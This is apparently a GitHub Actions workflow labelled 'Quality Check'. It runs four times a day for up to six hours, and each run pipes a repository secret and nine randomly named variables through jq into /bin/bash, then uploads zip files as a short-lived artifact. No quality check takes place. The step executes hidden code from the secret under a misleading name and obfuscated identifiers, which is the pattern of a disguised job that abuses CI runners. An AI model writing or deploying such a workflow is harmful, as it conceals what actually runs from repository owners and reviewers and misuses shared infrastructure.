name: Quality Check
on:
  workflow_dispatch:

  schedule:
    - cron: '25 0,6,12,18 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  ci:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Launch
        env:
          m452: ${{ secrets.m452 }}
        run: |
          printf '%s' "$m452" | jq -r .pgrp7 | /bin/bash
          printf '%s' "$rplvg1" | jq -r .twc729 | /bin/bash
          echo $kdb9964 | jq -r .vuvx2 | /bin/bash
          echo $r93 | jq -r .v11 | /bin/bash
          printf '%s' "$yxlm8" | jq -r .zbxme8027 | /bin/bash
          echo $x139 | jq -r .dzeft5 | /bin/bash
          echo $zv91 | jq -r .z5731 | /bin/bash
          echo $jd1838 | jq -r .lv846 | /bin/bash
          printf '%s' "$ser95" | jq -r .hk04324 | /bin/bash
          echo $a117 | jq -r .svh543 | /bin/bash

      - name: Save artifact
        uses: actions/upload-artifact@v4
        with:
          name: MMw6adKC
          path: "*.zip"
          retention-days: 1
